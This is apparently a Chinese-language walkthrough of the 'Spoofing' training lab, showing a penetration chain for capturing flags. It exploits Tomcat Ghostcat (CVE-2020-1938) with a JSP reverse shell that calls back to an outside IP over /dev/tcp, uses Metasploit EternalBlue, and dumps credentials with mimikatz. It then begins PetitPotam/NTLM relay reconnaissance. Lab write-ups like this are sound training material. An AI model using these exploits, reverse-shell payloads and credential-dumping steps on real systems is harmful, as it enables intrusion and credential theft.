春秋云镜 Spoofing

前言

本文所使用的工具可参考以下仓库：

Awesome_Pentest_Tools: 一站式渗透测试与红队工具合集，旨在帮助渗透测试人员打造自己的工具链

靶标介绍：

Spoofing是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag，分布于不同的靶机。

flag1

CVE-2020-1938

fscan扫一遍

./fscanPlus -h 39.99.132.128

  ______                   _____  _           
 |  ____|                 |  __ \| |          
 | |__ ___  ___ __ _ _ __ | |__) | |_   _ ___ 
 |  __/ __|/ __/ _  |  _ \|  ___/| | | | / __|
 | |  \__ \ (_| (_| | | | | |    | | |_| \__ \
 |_|  |___/\___\__,_|_| |_|_|    |_|\__,_|___/   
                     fscan version: 1.8.4 TeamdArk5 v1.0
start infoscan
39.99.132.128:22 open
39.99.132.128:8080 open
39.99.132.128:8009 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://39.99.132.128:8080 code:200 len:7091   title:后台管理
已完成 3/3
[*] 扫描结束,耗时: 43.341745316s
                                                                                      
┌──(matrix㉿matrix)-[~/Desktop/FscanPlus]
└─$ ./fscanPlus -h 39.99.132.128 -p 1-65535

  ______                   _____  _           
 |  ____|                 |  __ \| |          
 | |__ ___  ___ __ _ _ __ | |__) | |_   _ ___ 
 |  __/ __|/ __/ _  |  _ \|  ___/| | | | / __|
 | |  \__ \ (_| (_| | | | | |    | | |_| \__ \
 |_|  |___/\___\__,_|_| |_|_|    |_|\__,_|___/   
                     fscan version: 1.8.4 TeamdArk5 v1.0
start infoscan
39.99.132.128:53 open
39.99.132.128:22 open
39.99.132.128:8009 open
39.99.132.128:8080 open
[*] alive ports len is: 4
start vulscan
已完成 0/4 [-] webtitle http://39.99.132.128:53 Get "http://39.99.132.128:53": read tcp 192.168.230.133:35242->39.99.132.128:53: read: connection reset by peer 
[*] WebTitle http://39.99.132.128:8080 code:200 len:7091   title:后台管理
已完成 4/4
[*] 扫描结束,耗时: 4m42.749203482s

再上漏扫

nuclei -u http://39.99.132.128:8080/
                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[WRN] Found 1 templates with syntax error (use -validate flag for further examination)
[INF] Current nuclei version: v3.4.10 (outdated)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 8497
[INF] Executing 8295 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 202 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1796 (Reduced 1685 Requests)
[options-method] [http] [info] http://39.99.132.128:8080/ ["OPTIONS, GET, HEAD, POST"]
[tomcat-scripts] [http] [info] http://39.99.132.128:8080/examples/jsp/index.html
[tomcat-scripts] [http] [info] http://39.99.132.128:8080/examples/websocket/index.xhtml
[tomcat-stacktraces] [http] [low] http://39.99.132.128:8080/?f=\[
[tomcat-scripts] [http] [info] http://39.99.132.128:8080/examples/servlets/servlet/SessionExample
[http-missing-security-headers:x-frame-options] [http] [info] http://39.99.132.128:8080/
[http-missing-security-headers:x-content-type-options] [http] [info] http://39.99.132.128:8080/
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://39.99.132.128:8080/
[http-missing-security-headers:clear-site-data] [http] [info] http://39.99.132.128:8080/
[http-missing-security-headers:strict-transport-security] [http] [info] http://39.99.132.128:8080/
[http-missing-security-headers:content-security-policy] [http] [info] http://39.99.132.128:8080/
[http-missing-security-headers:referrer-policy] [http] [info] http://39.99.132.128:8080/
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://39.99.132.128:8080/
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://39.99.132.128:8080/
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://39.99.132.128:8080/
[http-missing-security-headers:permissions-policy] [http] [info] http://39.99.132.128:8080/
[tomcat-detect:version] [http] [info] http://39.99.132.128:8080/docs/introduction.html ["9.0.30"]
[INF] Scan completed in 1m. 17 matches found.

Tomcat 版本泄露

[tomcat-detect:version] .../docs/introduction.html ["9.0.30"]

暴露具体 Tomcat 版本（9.0.30），攻击者可针对该版本已知漏洞进行攻击。

searchsploit tomcat      
---------------------------------------------------- ---------------------------------
 Exploit Title                                      |  Path
---------------------------------------------------- ---------------------------------
4D WebSTAR 5.3/5.4 Tomcat Plugin - Remote Buffer Ov | osx/remote/25626.c
Apache 1.3.x + Tomcat 4.0.x/4.1.x mod_jk - Chunked  | unix/dos/22068.pl
Apache Commons FileUpload and Apache Tomcat - Denia | multiple/dos/31615.rb
Apache Tomcat (Windows) - 'runtime.getRuntime().exe | windows/local/7264.txt
Apache Tomcat - 'WebDAV' Remote File Disclosure     | multiple/remote/4530.pl
Apache Tomcat - Account Scanner / 'PUT' Request Com | multiple/remote/18619.txt
Apache Tomcat - AJP 'Ghostcat File Read/Inclusion   | multiple/webapps/48143.py
Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion  | multiple/webapps/49039.rb
Apache Tomcat - CGIServlet enableCmdLineArguments R | windows/remote/47073.rb
Apache Tomcat - Cookie Quote Handling Remote Inform | multiple/remote/9994.txt
Apache Tomcat - Form Authentication 'Username' Enum | multiple/remote/9995.txt
Apache Tomcat - WebDAV SSL Remote File Disclosure   | linux/remote/4552.pl
Apache Tomcat / Geronimo 1.0 - 'Sample Script cal2. | multiple/remote/27095.txt
Apache Tomcat 10.1 - Denial Of Service              | multiple/dos/51262.py
Apache Tomcat 10.1.39 - Denial of Service (DoS)     | multiple/remote/52318.py
Apache Tomcat 11.0.3 - Remote Code Execution        | multiple/webapps/52134.txt
Apache Tomcat 3.0 - Directory Traversal             | windows/remote/20716.txt
Apache Tomcat 3.1 - Path Revealing                  | multiple/remote/20131.txt
Apache Tomcat 3.2 - 404 Error Page Cross-Site Scrip | multiple/remote/33379.txt
Apache Tomcat 3.2 - Directory Disclosure            | unix/remote/21882.txt
Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scr | multiple/webapps/10292.txt
Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Informat | multiple/remote/21492.txt
Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Informatio | multiple/remote/21490.txt
Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root  | multiple/remote/21491.txt
Apache Tomcat 3.x - Null Byte Directory / File Disc | linux/remote/22205.txt
Apache Tomcat 3/4 - 'DefaultServlet' File Disclosur | unix/remote/21853.txt
Apache Tomcat 3/4 - JSP Engine Denial of Service    | linux/dos/21534.jsp
Apache Tomcat 4.0.3 - Denial of Service 'Device Nam | windows/webapps/21605.txt
Apache Tomcat 4.0.3 - Requests Containing MS-DOS De | multiple/remote/31551.txt
Apache Tomcat 4.0.3 - Servlet Mapping Cross-Site Sc | linux/remote/21604.txt
Apache Tomcat 4.0.x - Non-HTTP Request Denial of Se | linux/dos/23245.pl
Apache Tomcat 4.0/4.1 - Servlet Full Path Disclosur | unix/remote/21412.txt
Apache Tomcat 4.1 - JSP Request Cross-Site Scriptin | unix/remote/21734.txt
Apache Tomcat 5 - Information Disclosure            | multiple/remote/28254.txt
Apache Tomcat 5.5.0 < 5.5.29 / 6.0.0 < 6.0.26 - Inf | multiple/remote/12343.txt
Apache Tomcat 5.5.15 - cal2.jsp Cross-Site Scriptin | jsp/webapps/30563.txt
Apache Tomcat 5.5.25 - Cross-Site Request Forgery   | multiple/webapps/29435.txt
Apache Tomcat 5.x/6.0.x - Directory Traversal       | linux/remote/29739.txt
Apache Tomcat 6.0.10 - Documentation Sample Applica | multiple/remote/30052.txt
Apache Tomcat 6.0.13 - Host Manager Servlet Cross-S | multiple/remote/30495.html
Apache Tomcat 6.0.13 - Insecure Cookie Handling Quo | multiple/remote/30496.txt
Apache Tomcat 6.0.13 - JSP Example Web Applications | jsp/webapps/30189.txt
Apache Tomcat 6.0.15 - Cookie Quote Handling Remote | multiple/remote/31130.txt
Apache Tomcat 6.0.16 - 'HttpServletResponse.sendErr | multiple/remote/32138.txt
Apache Tomcat 6.0.16 - 'RequestDispatcher' Informat | multiple/remote/32137.txt
Apache Tomcat 6.0.18 - Form Authentication Existing | multiple/remote/33023.txt
Apache Tomcat 6/7/8/9 - Information Disclosure      | multiple/remote/41783.txt
Apache Tomcat 7.0.4 - 'sort' / 'orderBy' Cross-Site | linux/remote/35011.txt
Apache Tomcat 8/7/6 (Debian-Based Distros) - Local  | linux/local/40450.txt
Apache Tomcat 8/7/6 (RedHat Based Distros) - Local  | linux/local/40488.txt
Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS) | multiple/webapps/50119.txt
Apache Tomcat 9.0.0.M1 - Open Redirect              | multiple/webapps/50118.txt
Apache Tomcat < 5.5.17 - Remote Directory Listing   | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | multiple/remote/6229.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | unix/remote/14489.c
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47  | jsp/webapps/42966.py
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47  | windows/webapps/42953.txt
Apache Tomcat Connector jk2-2.0.2 mod_jk2 - Remote  | linux/remote/5386.txt
Apache Tomcat Connector mod_jk - 'exec-shield' Remo | linux/remote/4162.c
Apache Tomcat Manager - Application Deployer (Authe | multiple/remote/16317.rb
Apache Tomcat Manager - Application Upload (Authent | multiple/remote/31433.rb
Apache Tomcat mod_jk 1.2.20 - Remote Buffer Overflo | windows/remote/16798.rb
Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerS | php/remote/28713.php
AWStats 6.x - Apache Tomcat Configuration File Arbi | cgi/webapps/35035.txt
Jakarta Tomcat 3.x/4.0 - Error Message Information  | unix/local/21073.txt
Tomcat - Remote Code Execution via JSP Upload Bypas | java/remote/43008.rb
Tomcat 3.0/3.1 Snoop Servlet - Information Disclosu | multiple/remote/20132.txt
Tomcat 3.2.1/4.0 / Weblogic Server 5.1 - URL JSP Re | multiple/remote/20719.txt
Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escap | java/webapps/47892.txt
---------------------------------------------------- ---------------------------------
Shellcodes: No Results
---------------------------------------------------- ---------------------------------
 Paper Title                                        |  Path
---------------------------------------------------- ---------------------------------
Hardening & messing with win32 Apache Tomcat        | english/12878-hardening-&-messin
---------------------------------------------------- ---------------------------------

searchsploit 有Apache Tomcat - AJP 'Ghostcat File Read/Inclusion'（48143.py, 49039.rb）

这里开了8009端口，是AJP协议，很可疑。nuclei 扫描虽然没有直接提示 /ajp 相关内容，不过 Tomcat 9.0.30 属于 Ghostcat（CVE-2020-1938）受影响版本，如果 AJP 端口未加固，存在被利用风险。

1 2	`Apache Tomcat - AJP 'Ghostcat File Read/Inclusion \| multiple/webapps/48143.py Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion \| multiple/webapps/49039.rb`

默认 Kali Linux 安装了 exploitdb，这些脚本就在你本地的 /usr/share/exploitdb/ 目录下

1
2
3

# 通过locate 48143.py可以发现脚本位置为/usr/share/exploitdb/exploits/multiple/webapps/48143.py
# 复制脚本到当前目录
searchsploit -m 48143

上面poc应该可行，但是这里直接用GitHub的poc：Ghostcat-CNVD-2020-10487

python ajpShooter.py http://39.99.132.128:8080 8009  /WEB-INF/web.xml read
python ajpShooter.py http://39.99.132.128:8080 8009  /WEB-INF/web.xml read
/home/matrix/Desktop/Ghostcat-CNVD-2020-10487/ajpShooter.py:363: SyntaxWarning: invalid escape sequence '\ '
  /_\  (_)_ __   / _\ |__   ___   ___ | |_ ___ _ __

       _    _         __ _                 _            
      /_\  (_)_ __   / _\ |__   ___   ___ | |_ ___ _ __ 
     //_\\ | | '_ \  \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
    /  _  \| | |_) | _\ \ | | | (_) | (_) | ||  __/ |   
    \_/ \_// | .__/  \__/_| |_|\___/ \___/ \__\___|_|   
         |__/|_|                                        
                                                00theway,just for test
    

[<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"2489-1670857638305"
[<] Last-Modified: Mon, 12 Dec 2022 15:07:18 GMT
[<] Content-Type: application/xml
[<] Content-Length: 2489

<!DOCTYPE web-app PUBLIC
 "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
 "http://java.sun.com/dtd/web-app_2_3.dtd" >

<web-app>
  <display-name>Archetype Created Web Application</display-name>

  <security-constraint>
    <display-name>Tomcat Server Configuration Security Constraint</display-name>
    <web-resource-collection>
      <web-resource-name>Protected Area</web-resource-name>
      <url-pattern>/upload/*</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>admin</role-name>
    </auth-constraint>
  </security-constraint>

  <error-page>
    <error-code>404</error-code>
    <location>/404.html</location>
  </error-page>

  <error-page>
    <error-code>403</error-code>
    <location>/error.html</location>
  </error-page>

  <error-page>
    <exception-type>java.lang.Throwable</exception-type>
    <location>/error.html</location>
  </error-page>

  <servlet>
    <servlet-name>HelloServlet</servlet-name>
    <servlet-class>com.example.HelloServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>HelloServlet</servlet-name>
    <url-pattern>/HelloServlet</url-pattern>
  </servlet-mapping>

  <servlet>
    <display-name>LoginServlet</display-name>
    <servlet-name>LoginServlet</servlet-name>
    <servlet-class>com.example.LoginServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>LoginServlet</servlet-name>
    <url-pattern>/LoginServlet</url-pattern>
  </servlet-mapping>

  <servlet>
    <display-name>RegisterServlet</display-name>
    <servlet-name>RegisterServlet</servlet-name>
    <servlet-class>com.example.RegisterServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>RegisterServlet</servlet-name>
    <url-pattern>/RegisterServlet</url-pattern>
  </servlet-mapping>

  <servlet>
    <display-name>UploadTestServlet</display-name>
    <servlet-name>UploadTestServlet</servlet-name>
    <servlet-class>com.example.UploadTestServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>UploadTestServlet</servlet-name>
    <url-pattern>/UploadServlet</url-pattern>
  </servlet-mapping>

  <servlet>
    <display-name>DownloadFileServlet</display-name>
    <servlet-name>DownloadFileServlet</servlet-name>
    <servlet-class>com.example.DownloadFileServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>DownloadFileServlet</servlet-name>
    <url-pattern>/DownloadServlet</url-pattern>
  </servlet-mapping>
</web-app>

根据上面的敏感信息，看到有一个UploadServlet功能能上传文件，所以可以包含文件rce

1	`http://39.99.132.128:8080/UploadServlet`

上传的恶意文件文本内容

bash -i >& /dev/tcp/公网IP/54500 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC43NC4yMy81NDUwMCAwPiYx

<%
    java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC43NC4yMy81NDUwMCAwPiYx}|{base64,-d}|{bash,-i}").getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    out.print("</pre>");
%>

文件上传成功

1	`Files are stored in ./upload/4402ca1950948073bfb147acf9c4fa9a/20250925023751519.txt`

pwncat接受shell

1 2	`source pwncat-env/bin/activate (pwncat-env) root@iZ2ze29dp43ju4ubdmpjfeZ:~# pwncat-cs -lp 54500`

命令执行

1	`python ajpShooter.py http://39.99.132.128:8080 8009 /upload/4402ca1950948073bfb147acf9c4fa9a/20250925023751519.txt eval`

读flag

(remote) root@ubuntu:/# cat /root/flag/flag01.txt
  ████████                             ████ ██                 
 ██░░░░░░  ██████                     ░██░ ░░            █████ 
░██       ░██░░░██  ██████   ██████  ██████ ██ ███████  ██░░░██
░█████████░██  ░██ ██░░░░██ ██░░░░██░░░██░ ░██░░██░░░██░██  ░██
░░░░░░░░██░██████ ░██   ░██░██   ░██  ░██  ░██ ░██  ░██░░██████
       ░██░██░░░  ░██   ░██░██   ░██  ░██  ░██ ░██  ░██ ░░░░░██
 ████████ ░██     ░░██████ ░░██████   ░██  ░██ ███  ░██  █████ 
░░░░░░░░  ░░       ░░░░░░   ░░░░░░    ░░   ░░ ░░░   ░░  ░░░░░  

This is the first flag you get.

flag01: flag{10e32b00-2f48-45a1-b407-760619d715ef}

flag2

fscan扫一下

(remote) root@ubuntu:/# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.11.76  netmask 255.255.0.0  broadcast 172.22.255.255
        inet6 fe80::216:3eff:fe2d:df1e  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:2d:df:1e  txqueuelen 1000  (Ethernet)
        RX packets 524699  bytes 200721993 (200.7 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 422119  bytes 46669746 (46.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1386  bytes 127072 (127.0 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1386  bytes 127072 (127.0 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

(remote) root@ubuntu:/# ./fscan -h 172.22.11.76/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.11.6     is alive
(icmp) Target 172.22.11.76    is alive
(icmp) Target 172.22.11.45    is alive
(icmp) Target 172.22.11.26    is alive
[*] Icmp alive hosts len is: 4
172.22.11.76:22 open
172.22.11.6:445 open
172.22.11.26:139 open
172.22.11.45:139 open
172.22.11.6:139 open
172.22.11.26:135 open
172.22.11.45:135 open
172.22.11.6:135 open
172.22.11.76:8080 open
172.22.11.26:445 open
172.22.11.45:445 open
172.22.11.6:88 open
172.22.11.76:8009 open
[*] alive ports len is: 13
start vulscan
[*] NetInfo 
[*]172.22.11.26
   [->]XR-LCM3AE8B
   [->]172.22.11.26
[*] NetInfo 
[*]172.22.11.6
   [->]XIAORANG-DC
   [->]172.22.11.6
[+] MS17-010 172.22.11.45       (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.11.26    XIAORANG\XR-LCM3AE8B          
[*] NetBios 172.22.11.6     [+] DC:XIAORANG\XIAORANG-DC    
[*] NetBios 172.22.11.45    XR-DESKTOP.xiaorang.lab             Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle http://172.22.11.76:8080  code:200 len:7091   title:后台管理
已完成 13/13
[*] 扫描结束,耗时: 7.762083908s

# 感觉不全，扩大IP范围
./fscan -h 172.22.11.76/16

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.11.76    is alive
(icmp) Target 172.22.11.6     is alive
(icmp) Target 172.22.11.45    is alive
(icmp) Target 172.22.11.26    is alive
(icmp) Target 172.22.255.253  is alive
[*] LiveTop 172.22.0.0/16    段存活数量为: 5
[*] LiveTop 172.22.11.0/24   段存活数量为: 4
[*] Icmp alive hosts len is: 5
[*] LiveTop 172.22.255.0/24  段存活数量为: 1
172.22.11.26:445 open
172.22.11.6:445 open
172.22.11.45:445 open
172.22.11.26:139 open
172.22.11.45:139 open
172.22.11.6:139 open
172.22.11.26:135 open
172.22.11.45:135 open
172.22.11.6:135 open
172.22.11.6:88 open
[*] alive ports len is: 10
start vulscan
[*] NetInfo 
[*]172.22.11.6
   [->]XIAORANG-DC
   [->]172.22.11.6
[*] NetInfo 
[*]172.22.11.26
   [->]XR-LCM3AE8B
   [->]172.22.11.26
[*] NetBios 172.22.11.6     [+] DC:XIAORANG\XIAORANG-DC    
[*] NetBios 172.22.11.26    XIAORANG\XR-LCM3AE8B          
[*] NetBios 172.22.11.45    XR-DESKTOP.xiaorang.lab             Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[+] MS17-010 172.22.11.45       (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
已完成 10/10
[*] 扫描结束,耗时: 9.960776234s

总结一下

(icmp) Target 172.22.11.76    is alive
(icmp) Target 172.22.11.6     DC:XIAORANG\XIAORANG-DC 
(icmp) Target 172.22.11.45    XR-DESKTOP.xiaorang.lab(Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
(icmp) Target 172.22.11.26    XIAORANG\XR-LCM3AE8B 
(icmp) Target 172.22.255.253  is alive

ms17_010

直接打永恒之蓝

# 不好使
use exploit/windows/smb/ms17_010_eternalblue
set proxies socks5:127.0.0.1:55556
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.11.45
set lport 54524
run

# 好使
use exploit/windows/smb/ms17_010_eternalblue
set proxies socks5:127.0.0.1:55556
set payload payload/windows/x64/meterpreter/bind_tcp
set rhosts 172.22.11.45
set lport 54524
run

获取flag，可以用execute指令执行文件

PS C:\Windows\system32> cat C:/users/administrator/flag/flag02.txt
cat C:/users/administrator/flag/flag02.txt
                                                      ##                        
  :####:                                   :####      ##                        
 :######                                   #####      ##                        
 ##:  :#                                   ##                                   
 ##        ##.###:    .####.    .####.   #######    ####     ##.####    :###:## 
 ###:      #######:  .######.  .######.  #######    ####     #######   .####### 
 :#####:   ###  ###  ###  ###  ###  ###    ##         ##     ###  :##  ###  ### 
  .#####:  ##.  .##  ##.  .##  ##.  .##    ##         ##     ##    ##  ##.  .## 
     :###  ##    ##  ##    ##  ##    ##    ##         ##     ##    ##  ##    ## 
       ##  ##.  .##  ##.  .##  ##.  .##    ##         ##     ##    ##  ##.  .## 
 #:.  :##  ###  ###  ###  ###  ###  ###    ##         ##     ##    ##  ###  ### 
 #######:  #######:  .######.  .######.    ##      ########  ##    ##  .####### 
 .#####:   ##.###:    .####.    .####.     ##      ########  ##    ##   :###:## 
           ##                                                           #.  :## 
           ##                                                           ######  
           ##                                                           :####:  


flag02: flag{ffd82b2a-8762-4dd2-95c2-bae51147e03b}

flag3

PetitPotam强制认证

列出票据

得到两个用户，机器账号xr-desktop$和用户yangmei

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:48f6da83eb89a4da8a1cc963b855a799:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username     Domain    NTLM                              SHA1
--------     ------    ----                              ----
XR-DESKTOP$  XIAORANG  738dcc0171b84e1a36400008983a3e10  fdc3f1fd9d44fea97d24ce212d6339ec890cfdf4
yangmei      XIAORANG  25e42ef4cc0ab6a8ff9e3edbbda91841  6b2838f81b57faed5d860adaf9401b0edb269a6f

wdigest credentials
===================

Username     Domain    Password
--------     ------    --------
(null)       (null)    (null)
XR-DESKTOP$  XIAORANG  7d c7 ba cf 2e 52 36 1a 8a 7c 53 e3 dc 71 7e d4 3a 3e c1 e5 60 0d 09 2a a6 b2 b3 73 19 32 1f d8 7d 28 69 48 fe 7a 4c 28 32 49 58 e9 47 71 98 8e 51 c0 80 74 ed 14 91 fb e0 43 21 37 75 cf d
                       5 91 53 0f 96 03 48 99 1d 54 34 52 71 96 b0 a2 af 96 96 c4 18 53 4b 71 f6 72 22 2b 74 64 69 05 38 e9 d6 a2 22 cc 3a 98 f2 7d aa f2 e0 07 ee 92 8c 31 24 fa 42 c4 94 1b e5 8e c4 df 80 c0 09
                        7b aa af dd cd 8f 86 08 e1 41 4d 53 2e 0d d8 91 2f d8 36 a8 1f 7a e8 0d 47 a4 16 1a c4 56 b9 e0 96 13 ef c9 70 8c 64 8d 9a d5 75 7f 2f 3d c4 36 5e 1f 8a 16 6c 9e aa 11 01 b1 13 ab 0d f8
                       dd 98 3a d1 01 b6 e1 f5 51 50 82 eb 02 b5 bb c0 cc 4b 63 f4 71 0f 2c 49 de 19 3d a3 cf ab 32 29 a6 69 04 77 76 63 a7 3a 5a b9 f6 7f 97 b9 6b ff 22 84 6e 22 9d
yangmei      XIAORANG  xrihGHgoNZQ

kerberos credentials
====================

Username     Domain        Password
--------     ------        --------
(null)       (null)        (null)
xr-desktop$  XIAORANG.LAB  7d c7 ba cf 2e 52 36 1a 8a 7c 53 e3 dc 71 7e d4 3a 3e c1 e5 60 0d 09 2a a6 b2 b3 73 19 32 1f d8 7d 28 69 48 fe 7a 4c 28 32 49 58 e9 47 71 98 8e 51 c0 80 74 ed 14 91 fb e0 43 21 37 75
                           cf d5 91 53 0f 96 03 48 99 1d 54 34 52 71 96 b0 a2 af 96 96 c4 18 53 4b 71 f6 72 22 2b 74 64 69 05 38 e9 d6 a2 22 cc 3a 98 f2 7d aa f2 e0 07 ee 92 8c 31 24 fa 42 c4 94 1b e5 8e c4 df
                           80 c0 09 7b aa af dd cd 8f 86 08 e1 41 4d 53 2e 0d d8 91 2f d8 36 a8 1f 7a e8 0d 47 a4 16 1a c4 56 b9 e0 96 13 ef c9 70 8c 64 8d 9a d5 75 7f 2f 3d c4 36 5e 1f 8a 16 6c 9e aa 11 01 b1
                           13 ab 0d f8 dd 98 3a d1 01 b6 e1 f5 51 50 82 eb 02 b5 bb c0 cc 4b 63 f4 71 0f 2c 49 de 19 3d a3 cf ab 32 29 a6 69 04 77 76 63 a7 3a 5a b9 f6 7f 97 b9 6b ff 22 84 6e 22 9d
xr-desktop$  XIAORANG.LAB  (null)
yangmei      XIAORANG.LAB  xrihGHgoNZQ

这边快速过一下 (一句话总结：不能直接拿下域控)

使用Bloodhound收集到的用户名组合获取到的密码/hashes组合爆破，没发现其他新用户
MAQ = 0，加不了计算机
当前LDAP 没 TLS，远程也加不了计算机，impacket的addcomputer有两种方法samr和ldaps。samr受到MAQ = 0的限制，无法添加计算机；ldaps受到没TLS + MAQ = 0 的限制
域控存在nopac，当前用户yangmei使用nopac没打死，并且对域内computer container没有createchild的ACL
域控存在nopac，当前用户yangmei对当前windows机器xr-desktop没WriteDacl权限，意味着无法修改SamAccountName
域内存在 DFscoerce 和 petitpotam，但是不存在CVE-2019-1040，因此放弃 DFscoerce，优先使用petitpotam
NoPac exploit: Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user (github.com)

靶场提示了NTLM，因此用cme看下WebClient和petitpotam

虽然本地有crackmapexec，但是卡的批爆，去下了个cme的可执行文件 CME，扫一下WebClient和petitpotam

1
2
3

crackmapexec smb target -u username -H <NTLM_HASH> -d domain
proxychains crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -d xiaorang.lab -M Webdav
proxychains crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -d xiaorang.lab -M PetitPotam

确实有Petitpotam，按题目里的提示应该是要打NTLM Relay via WebDAV+Petitpotam的Coerce Authentication，又去翻了一下红队域渗透NTLM Relay：强制认证方式总结，大概意思就是我们可以用Petitpotam强制目标服务器、目标用户使用LM Hash、NTLM Hash对我们的服务器进行认证，然后我们可以将该认证中继至其他目标服务器中以达到横向、提权等的目的，这里只有172.22.11.26有Petitpotam。通过WebDav进行NTLM Relay的好处在于可以不受到协议签名的影响，对本地内部网或受信任的站点自动使用当前用户凭据进行NTLM认证。

这里看的春秋云镜-【仿真场景】Spoofing writeup，使用无ADCS + Petitpotam + ntlm中继打法，思路是用petitpotam触发存在漏洞且开启了webclient服务的目标，利用petitpotam触发目标访问我们的http中继服务，目标将会使用webclient携带ntlm认证访问我们的中继，并且将其认证中继到ldap，获取到机器账户的身份，以机器账户的身份修改其自身的msDS-AllowedToActOnBehalfOfOtherIdentity属性，配置到XR-LCM3AE8B.xiaorang.lab的RBCD。

但这里有个条件，需要我们把服务器端口的流量转发到客户端本地的80，但SSH的反向端口转发监听的时候只会监听127.0.0.1，这里我们让流量 0.0.0.0:80 转发到 127.0.0.1:79，再反向转发回客户端本地的80 ,变相使80监听在0.0.0.0

先扫一下是否存在webdav，172.22.11.26机器上存在WEBDAV服务

存在PetitPotam

proxychains ./cme smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -d xiaorang.lab -M Webdav
proxychains ./cme smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -d xiaorang.lab -M PetitPotam

proxychains ./cme smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M webdav

